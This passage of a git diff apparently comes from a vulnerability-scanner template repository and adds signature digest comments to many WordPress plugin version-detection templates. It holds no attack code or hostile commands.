0db316d66d..505d0ef6a7 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a3278806ec511ad6bbc08864d1771b72e720e4f6f9e9e4defdfa5ff60d6dfdfe02207a86b4348b116af4a70ebed5d055a8a2b3cc3f1a2d24e5e8d8a57d859aa348dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..9c72812962 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcc35be7dfaa28bd16f129ecb3f78bde484781aeca4102adb72de488bf552308022049e06a494b1d46d6c50a972d5e52aa3637ed62690a80efb71e55c7a3e2c281d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..b56034d651 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058a025e2d2699b6c7fe94491e2283c042ac8c374bea62642f805f2e1964a908e022058019102f33cb82394e16f80df6aa4287d85f112ad841b4fa491aebf243b6556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..5cb3f18926 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100941edd7c279575d7aaea5e287586f7c99d047c868039526e6dfbf2c2e532db8e02201fa6b8b9c60e941699aa3f2419f8d27fb27e67d2ed5effd8b3c2f8464e2a418d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..5e296a4e89 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b11fc46b001a341afb2decba0f1a9c9371f8873f869fa6288585d2636a7b3f3022100a7cc21c968b50e9fc5ad173e8ae07a841dd8a4f34656a40e4cc6bfd5d4594144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..e480e2630d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b9919056b95c1e960d2007e49ed16620e0a34c1b2b05c38aaa1cd2c560cba6b0221009a6d06f1a4462649b9e42f9c67844c3383e5c61fdc1987fc7ba3236f2b06de55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..3336134e96 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022047606f9c2da01c80605af6818d00bb1de68b7eaf5bf2d8192399a9ed4883e77f022100a4a399946abeea266db2cc401d9af6c86cc1b4844c5b16577361c5771cef7675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..3a03ef7027 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036e3aaf37f55861226f6cdfdb38d6af7e208a94e8de1185ec9e054d3580aa9c9022100b8ae5b5b28d07b87b96df71c7a7adb95bd65a8d601148f7bb9368c359abf55df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..4278a63771 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d3d91eb685904e78f0bea9e3671b170ee44c8e372be306eb8b1296f761c631c022027a8678b58292dad261408cc40837f5b0578c0b949140aaa86931cb3784fb9d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..687b3a176a 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b03c8c4794ca592c20cb38f0a2643e46770e5301945b0be5a0311e845e1686d302201d3de361847d2ae30d9ed62aac56285e441d6a68444614a0c19bfbb615010f93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..c528c69ce5 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b067d481bd15652286123b66f51afeae277030022740f3aeb529d30719ddd5c0220470c096a49ede2a9ff9b6ad91b0ef14dc3bd21ee9015612ee81737a7dd739438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..cee81131dc 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f80ea454d4da76ac45f00962134afaab99834d22d807f5ca2c392efc0df09595022100f321482de0c598946fdecab110117aa0bc6f0b3d4bc01bf1d87ac39b39e0e2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..139b174f9d 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ff6e9e7a4b7af0c61f24625a03e4c3a0b27f8472227611f328d8eb1b77ba40f02201725bba198101b57963307dc523d82c6710b929edfd7b81d68c029871ec2468d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..85b1b16cd6 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd67c7cad798b12d8c7e784f78dbf20c73fd5c0056e70f2b20e4a96c30b7c9c9022032970b38df94549078c8f2f15b8a0232650252afd328c1dc62d67f838d83380e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..6da78477a6 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3be46951b4c6f594708e58865f5c0c98a673ba7315420a59e0288afe96bf68f022100d2e2d10ad7acf98ebe63cebbe2105e789fa201e47086e654a0a466b621a0bef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..b66b1df938 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220761e14cbc5cee2d4598159cb9d0eebe59d4d32c5021777ea065b25dd516edbc60220599cbfee8cf653644fb54c68cb23e9bdd05b3be4c1f04c84629548462b62cc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..47c19f7450 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1f6e4dddbf6189ec24b303df5f9fb219dcaae9adc46f0a596d7b599f1fda42e022100e4607390aa0009b5e950d13c855eedfe655bb6fe3c7a36368821089d1b661cc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..dbcae17bcf 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc7d6e2d73eb79b2f65b6327dd3efa4abd55de277d379cc77796c4390374f929022100c9768abf053f46875258d8dc6664490900013165d98c3e056cdb47432bd6bcdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..349b5b498c 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2ee65a807503050fe94546a3b63a68401abdfc334a5c9181337c1124bee0b1a022032ffee7ee276059a54a8cf96100e3be6016b279d819e7287f7fb348e78ad922b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..9f0c10fbc5 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8a107f2e98704a3e6ec0ce84889991e1e7322c4cd957ef226d4dd7f2138a2f2022100971ef8e5eaed9cd47f7ee1cdb98b2b10a66dd440d706a215e6f0c4737a21913a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..076b0e2913 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fef7708e766e4084a8e42c7b236f27a02d5b478a274ecc1e3390eff141c909e7022100c394ea0d0680d0473ed81c681938fa0d4da55a436a252f4479bf9dc17120420f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..efadb0f09f 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc4a78abb3b36f4de5ca543a330af8fffcc4df4b7e9fb672ba94af3a84627e000221008bd84a833c2df39bfd648908c566796f5b13d97f9a04243821cc2338e93a6d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..7e735d644e 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030595eafffedf9b89f235adbfd0841c976ade9dd6f8f990bce14295295717a5502200be0ff7355d95bd1bbb3c66bf6a2dfb5c45e32afcee4239cb5d442be3e7f9bfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..6ba9b5f2db 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100baff57bf2654caa12f8990663437a5fdfb186508345aba3d5c041473b93659e302202c5adaf8aaeb2e101c8db3f7e8a2309f2fb549947a6a13f5276119663c54a49c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..1d5bf37717 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd64fe4ee3f3d49087dd8ceecbf1621b6af87802a1e2c7fe8f19bd45d262499502201086375249e4fbb0b1fe8d9c9aafcd35d97814cb08b16918e5ceb6ae90bc7dfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..eb9ad5c1b7 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ebf80adc7c169863d5736130b7baccb44d41de455cb70b6392a77048e7294819022010d9900168c4a09a84ad1ca2d7fecc00ad6e96889240d47034b669909794ba59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..34f96e18f5 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205757a9c842a9ee5261002d13e879690d3acbd56d7c4a7837fd8e7cd282772e33022033dd8f1505779e1a30cc95349d85c94fb4c26f10f8c292e7ff91378f137b166d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..c6d9a40082 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf7607652457f98ac33f2252bc02cf0cd5382f07a897b298f1213aff51c89f0f02203f4f6bde6c0b65e432cfda50da726fef9f78352404136be8dabe214e1ead5cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..8c544b6fc4 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2d1f2eedb1a01e3d9ac75e9fd7aa8a5bead037f428433b4a2011cfc3589e871022100c560555a68aff5eae9e148bd56ffa1df2eeed601b0c1a87075c3bd2f23661261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..e561bcffdb 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d13b1ec4c7417dbe8f5edc5509c1f1c2d5cb9ec78e6d793183d414fa6dd63559022010102565272834d901cbecfbb36956d11cf924f5e9e14c186d66a35de61af048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..d3660728af 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a12e1a0d0ea70bceadadbc4a3d15a8bb37e96a1634a07f2c23d0b4071df70e50221009c78925ac62cce2bc9c62c3e2ef92a8f0e2224c6ef0a97e5358a31d60644e849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..5e7efbf65b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d8619e2b237023e58bbae3a0b21d4128acc8c37f5c82ee4e82aee308e5fe9730220368d359e28d1775b64b35e65402697104da61c30c8e8a7675c6d799697e59691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..3fd4c96103 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009e5bffc607e9345e130a52049915a7eb9df229e121a1286e1eb3d12302ec742e022100dfb624c46c5cd73410b9924366014f9f7ec1399c820f0af5dc505ef8cb5b0750:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..31c74427ee 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207102c9f229647847eb1df793dbafda3c10c7c305cc5d375a508acaaa6a46bb13022100c96eccad018c71aca863ef88162fcccd7cc018d1f59eed45c2b7d83321213326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..ea8675cc2d 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203809666890d98bf9d43971212befa2f776ecae4ac908ba43b4cfa3b81efea10f022013cdf49e6bd251636d793561d7e8b27a2062155705c9b0297db684edec7c917e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..f012f3f93d 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220095a4585f26f95353b1121ac40604b38c177c5714c8fcb778661ccf3e24622ca022100cf5052a2ab89ecf94d1027e047756bc254b86d7ec2feee61806a46a60ba2fd48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..028736d924 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052b8843cf222b591b6e6f59b040e289ba108ebaafd853860b7243b5d801def5b02204f6e3a651621ab67b242b3d770fb729702510ee74769833c520af058339a7258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..42a731bd9f 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039971a62cca44a7b6042a5916ab783820ba34771c1a9358c46cc7a4d6d0c94c20221008cfaa96d2d0ffd82fa079bf75cf41e4a0b58dd572fba8983552625da0b53be01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..b12d55596a 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fae921f57de429264a72a9de7522935e8e98cd045e9b9c8a02790499f4ca48910221009c467969fb109d0dbc31328a7232c5dc0edaae7208f9b862358f14aed34ae10a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..dfd85d34a9 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ec517d247ffe0c2a82d2ef8b8ee0c9210a35e355a61a11dc92652e04701dc5a1022100c6c2bfc3ff611234f123613c5c0ebc465b418cfed8799d958c6bb5b95cdc04f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..89cb39f446 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022027f0db1259e487861e87d97f0c111416e2d60eac7898585b11e6f6c108f94501022100d256eab4f3adb22f2d06482f1acd66b0e06f32c108c3e79ee02925b68affcbe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..66c2857248 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040d8a47b8c332e59fedd2362ae0ba97f1404cce9beadfd259f04f46eaec1728402207a9999da9d2137c089b8c05a13043f2695bafff03a572a5e22189550b3947c07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..f3e0d59292 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032e332d570da51acbb9c98bf3b3d9d4c71667efdb1016fa5aa1bf7fc847e6a6902202f5aeb1c35070265e77c58fc8d2b996db1851c5804ee3709de1e91b807dd79be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..45adb29ee7 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ed7a34f95b2aff40ac4df2668937e37b5a8d3a358a25a70083c0642f33c4fbe02202a98c6da37907a9b8c645e9c5126e5d6d9eeefada58e39975d6b2599588f273b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..2b28979964 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c5e229c850e9dc4a8d959506c761841ab6a698c075e83250da749b8a7d5ff1802210081bbe21a659a69a36c3512ab539d0f82f02ecba9dd7c8ebd8c6003ccb52d85e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..3586387ab2 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036d294ff7c4d488f17e87f8ab4a9a0ffeea25c474478672d67aa50876eb92ca2022100e485fcac51237f8761c2fbd4d7e08582e653c9a8bc49de545b538d6214602f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..70dba3f4d0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c53a0b8c4d7f07f825be1e030363d1b6692d4aaec1528553b1506b3bf2d336102203b59fff9bec6496ef35ca8bbcaa0e2612e5511a02d09e87de8dd761b1046c855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 